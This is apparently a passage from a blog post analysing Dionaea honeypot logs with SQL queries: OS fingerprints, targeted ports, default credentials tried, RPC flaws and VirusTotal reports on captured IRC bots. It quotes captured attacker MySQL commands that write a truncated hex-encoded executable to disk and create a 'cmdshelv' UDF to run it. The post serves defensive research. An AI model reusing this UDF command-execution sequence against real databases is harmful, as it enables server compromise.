I have also list SQL requests used to get these informations.
P0f informations
P0f is a passive OS fingerprinting tool which will analyze network traffic to get informations like operating system version, firewall presence, NAT use, distance to the remote host and also about the kind of link used.
FYI : You need to enable p0f in dionaea configuration file and run p0f tool in order to have these datas.
select count(p0f_genre||p0f_detail) as count, (p0f_genre || " " || p0f_detail) as OS from p0fs group by (p0f_genre||p0f_detail) order by count desc;
count | OS |
---|---|
7509 | |
104 | Windows 2000 SP4, XP SP1+ |
46 | Windows XP/2000 (RFC1323+, w+, tstamp-) |
31 | Windows 2000 SP2+, XP SP1+ (seldom 98) |
17 | Linux 2.6 (newer, 3) |
11 | Linux 2.6 (newer, 2) |
8 | Windows XP SP1+, 2000 SP3 |
7 | Linux 2.4-2.6 |
6 | Windows XP/2000 (RFC1323+, w, tstamp+) |
3 | Windows 95 |
2 | SunOS 4.1.x |
1 | Linux 2.6? (barebone, rare!) |
1 | Windows 98 (no sack) |
select count(p0f_link) as count, p0f_link as link from p0fs group by p0f_link order by count desc;
count | link |
---|---|
6051 | |
1533 | ethernet/modem |
101 | pppoe (DSL) |
39 | IPv6/IPIP |
10 | (Google/AOL) |
5 | GPRS, T1, FreeS/WAN |
3 | PIX, SMC, sometimes wireless |
3 | sometimes DSL (2) |
1 | vtun |
Targeted local port
select count(local_port) as count, local_port as "targeted port" from connections group by local_port order by count desc;
count | targeted port |
---|---|
1201 | 42 |
335 | 80 |
123 | 135 |
113 | 1433 |
87 | 32554 |
72 | 32045 |
61 | 5060 |
38 | 3389 |
38 | 8008 |
37 | 23 |
... | |
18 | 445 |
... |
Services most targeted here are WINS, Web servers, Epmap/DCOM, SQL Server, Sip, RDP, Telnet.
Location of attackers / malware sources
select count(remote_host) as count, remote_host from connections group by remote_host order by count desc;
If we look at the map, we can see lot of connections from France. But I can explain some of them, because when my honeypot was running, I have launched some ports scan. In order to have reliable statistics, I have removed of the sqlite database connections coming from my IP but I think I've omitted some of them.
Protocol informations
select count(connection_transport) as count, connection_transport from connections group by connection_transport order by count desc;
count | connection_transport |
---|---|
6959 | tcp |
85 | udp |
13 | tls |
select count(connection_protocol) as count, connection_protocol from connections group by connection_protocol order by count desc;
count | connection_protocol |
---|---|
3929 | pcap |
1204 | mirrorc |
1201 | mirrord |
335 | httpd |
123 | epmapper |
113 | mssqld |
70 | SipSession |
54 | TftpClient |
17 | smbd |
7 | mysqld |
4 | SipCall |
Default passwords
select count(logins.login_username||logins.login_password) as count, logins.login_username, logins.login_password, connections.connection_protocol, connections.local_port from logins, connections where connections.connection = logins.connection group by (logins.login_username||logins.login_password) order by count desc;
count | login_username | login_password | connection_protocol | local_port |
---|---|---|---|---|
95 | sa | mssqld | 1433 | |
6 | root | mysqld | 3306 |
Malwares targeting my honeypot have tried to connect to MySQL with root/ and to Microsoft SQL Server with sa/ which are both default credentials.
MySQL requests
select * from mysql_command_args;
Look output of this request is quite fun :
drop function cmdshell
drop function cmdshell
drop function my_udfdoor
drop function my_udfdoor
drop function do_system
drop function do_system
use mysql;
use mysql;
drop table if exists tempMix4;
drop table if exists tempMix4;
create table if not exists tempMix4(data LONGBLOB);
create table if not exists tempMix4(data LONGBLOB);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
INSERT INTO tempMix4 VALUES (@a);
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';
drop table if exists tempMix4;
use mysql;
drop table if exists tempMix;
create table if not exists tempMix(data LONGBLOB);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
INSERT INTO tempMix VALUES (@a);
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'
INSERT INTO tempMix4 VALUES (@a);
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll'
drop table if exists tempMix4;
select data from tempMix into DUMPFILE 'D:\\amd.dll'
use mysql;
select data from tempMix into DUMPFILE '..\\bin\\amd.dll'
drop table if exists tempMix;
create table if not exists tempMix(data LONGBLOB);
create function cmdshelv returns string soname 'amd.dll';
create function cmdshelv returns string soname 'amd.dll'
create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll'
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll';
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll';
create function cmdshelv returns string soname 'amd.dll'
select cmdshelv('c:\\12345.exe')
select cmdshelv('c:\\12345.exe');
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
select cmdshelv('cmd.exe cmd/c del c:\12345.exe');
For more informations, you can read this article : http://carnivore.it/2011/06/12/the_mysql_cmdshelv
RPC vulnerabilities
select dcerpcservices.dcerpcservice_name, dcerpcserviceops.dcerpcserviceop_name, dcerpcserviceops.dcerpcserviceop_vuln from dcerpcservices, dcerpcserviceops where dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice and dcerpcserviceop_vuln is not "";
dcerpcservice_name | dcerpcserviceop_name | dcerpcserviceop_vuln |
---|---|---|
DCOM | RemoteActivation | MS03-26 |
DSSETUP | DsRolerUpgradeDownlevelServer | MS04-11 |
ISystemActivator | RemoteCreateInstance | MS04-12 |
MSMQ | QMCreateObjectInternal | MS07-065 |
MSMQ | QMDeleteObject | MS05-017 |
NWWKS | NwChangePassword | MS06-66 |
NWWKS | NwOpenEnumNdsSubTrees | MS06-66 |
PNP | PNP_QueryResConfList | MS05-39 |
SRVSVC | NetPathCanonicalize | MS08-67 |
SRVSVC | NetPathCompare | MS08-67 |
WKSSVC | NetAddAlternateComputerName | MS03-39 |
nddeapi | NDdeSetTrustedShareW | MS04-031 |
Malware URLs
select downloads.download_url, downloads.download_md5_hash,connections.local_port from downloads, connections where downloads.connection=connections.connection;
All malwares have been downloaded on TFTP servers and are link to connections with port 135. As URLs are pointing to malwares, I won't show them here.
Virustotal reports
select virustotal_permalink from virustotals;
http://www.virustotal.com/file-scan/report.html?id=1a934b461b5c40172958415928b23ae6b75bf194ecb1927ce09c30b765f09d92-1312716887
http://www.virustotal.com/file-scan/report.html?id=badf757dbbcb192bceb0ac9e2c949dfbe3d2a1022a6017ab3be611053f6412ef-1299403039
http://www.virustotal.com/file-scan/report.html?id=cdcfa06de82598a06d3eba5259306a5caccfbf0265625ad65de8de2620e17131-1312716944
http://www.virustotal.com/file-scan/report.html?id=4f226d64e7083b0cb7e36076edd76520498e95cb24380bbd469b13e46096b7ad-1312716946
http://www.virustotal.com/file-scan/report.html?id=273040d07e3d2c1153967015fa069de7e3086163651babcc07ab321b289d70d5-1314124477
http://www.virustotal.com/file-scan/report.html?id=922a7d3c82c4782f9795a82271df3be8628eefa6a0fa104caad7472772f5e43e-1312713825
http://www.virustotal.com/file-scan/report.html?id=ec9b2bf6a6fdb2aa5b699ea897925e2e3b152aecc6db28c47992607871a50c28-1312713850
http://www.virustotal.com/file-scan/report.html?id=dc64e5eb25f14b17b415a1c73523e0825d6f79a8b0f47194c097028d1dc93003-1310608851
http://www.virustotal.com/file-scan/report.html?id=9f932547a0f1050fcc06513b1701d817c201904820b710daa2d8907e19383b6a-1307217666
http://www.virustotal.com/file-scan/report.html?id=878949d20c4c07cbe21e96f24d77e8c3387e8fc65e60250138ab94ee5d3fb561-1312713864
http://www.virustotal.com/file-scan/report.html?id=137d09a12f04cfee5dbd0e98422a127f8ca7bc1d26c118be067251a456afecdc-1314040714
http://www.virustotal.com/file-scan/report.html?id=83c334585c33b1996697cc0ff5f7b131b065628c2dc6f4c81a0ea9e1a341baf7-1310796380
All these URLs are Virustotal report of malwares capturated by my honeypot. Most of them have been submitted to Virustotal this summer. According reports, they are all IRC bots. As detection rate is high (between 93% and 98%), they are not an important threat for our computer as long as user is not stupid.
http://www.virustotal.com/file-scan/report.html?id=1a934b461b5c40172958415928b23ae6b75bf194ecb1927ce09c30b765f09d92-1312716887
http://www.virustotal.com/file-scan/report.html?id=badf757dbbcb192bceb0ac9e2c949dfbe3d2a1022a6017ab3be611053f6412ef-1299403039
http://www.virustotal.com/file-scan/report.html?id=cdcfa06de82598a06d3eba5259306a5caccfbf0265625ad65de8de2620e17131-1312716944
http://www.virustotal.com/file-scan/report.html?id=4f226d64e7083b0cb7e36076edd76520498e95cb24380bbd469b13e46096b7ad-1312716946
http://www.virustotal.com/file-scan/report.html?id=273040d07e3d2c1153967015fa069de7e3086163651babcc07ab321b289d70d5-1314124477
http://www.virustotal.com/file-scan/report.html?id=922a7d3c82c4782f9795a82271df3be8628eefa6a0fa104caad7472772f5e43e-1312713825
http://www.virustotal.com/file-scan/report.html?id=ec9b2bf6a6fdb2aa5b699ea897925e2e3b152aecc6db28c47992607871a50c28-1312713850
http://www.virustotal.com/file-scan/report.html?id=dc64e5eb25f14b17b415a1c73523e0825d6f79a8b0f47194c097028d1dc93003-1310608851
http://www.virustotal.com/file-scan/report.html?id=9f932547a0f1050fcc06513b1701d817c201904820b710daa2d8907e19383b6a-1307217666
http://www.virustotal.com/file-scan/report.html?id=878949d20c4c07cbe21e96f24d77e8c3387e8fc65e60250138ab94ee5d3fb561-1312713864
http://www.virustotal.com/file-scan/report.html?id=137d09a12f04cfee5dbd0e98422a127f8ca7bc1d26c118be067251a456afecdc-1314040714
http://www.virustotal.com/file-scan/report.html?id=83c334585c33b1996697cc0ff5f7b131b065628c2dc6f4c81a0ea9e1a341baf7-1310796380
All these URLs are Virustotal report of malwares capturated by my honeypot. Most of them have been submitted to Virustotal this summer. According reports, they are all IRC bots. As detection rate is high (between 93% and 98%), they are not an important threat for our computer as long as user is not stupid.
damn, i just found these in my mysql dir...
ReplyDelete-rw-rw-rw- 1 mysql mysql 32482 2012-06-06 19:09 \usr\lib\mysql\plugin\mmsql.dll
-rw-rw-rw- 1 mysql mysql 164 2012-06-06 19:09 c:\docume~1\alluse~1\????ʼ???˵?\????\????\a.vbs
-rw-rw-rw- 1 mysql mysql 196608 2012-06-07 20:01 C:\18181.exe
-rw-rw-rw- 1 mysql mysql 40960 2012-06-07 20:01 C:\WINDOWS\amd.dll
-rw-rw-rw- 1 mysql mysql 40960 2012-06-07 20:01 C:\WINT\amd.dll
-rw-rw-rw- 1 mysql mysql 40960 2012-06-07 20:01 C:\WINDOWS\SYSTEM32\amd.dll
-rw-rw-rw- 1 mysql mysql 40960 2012-06-07 20:01 C:\amd.dll
-rw-rw-rw- 1 mysql mysql 63501 2012-07-19 06:07 C:\11188.exe
ubuntu 12.04, admittedly not very secure.
No evidence in bash_history or mysql_history.
Any advice?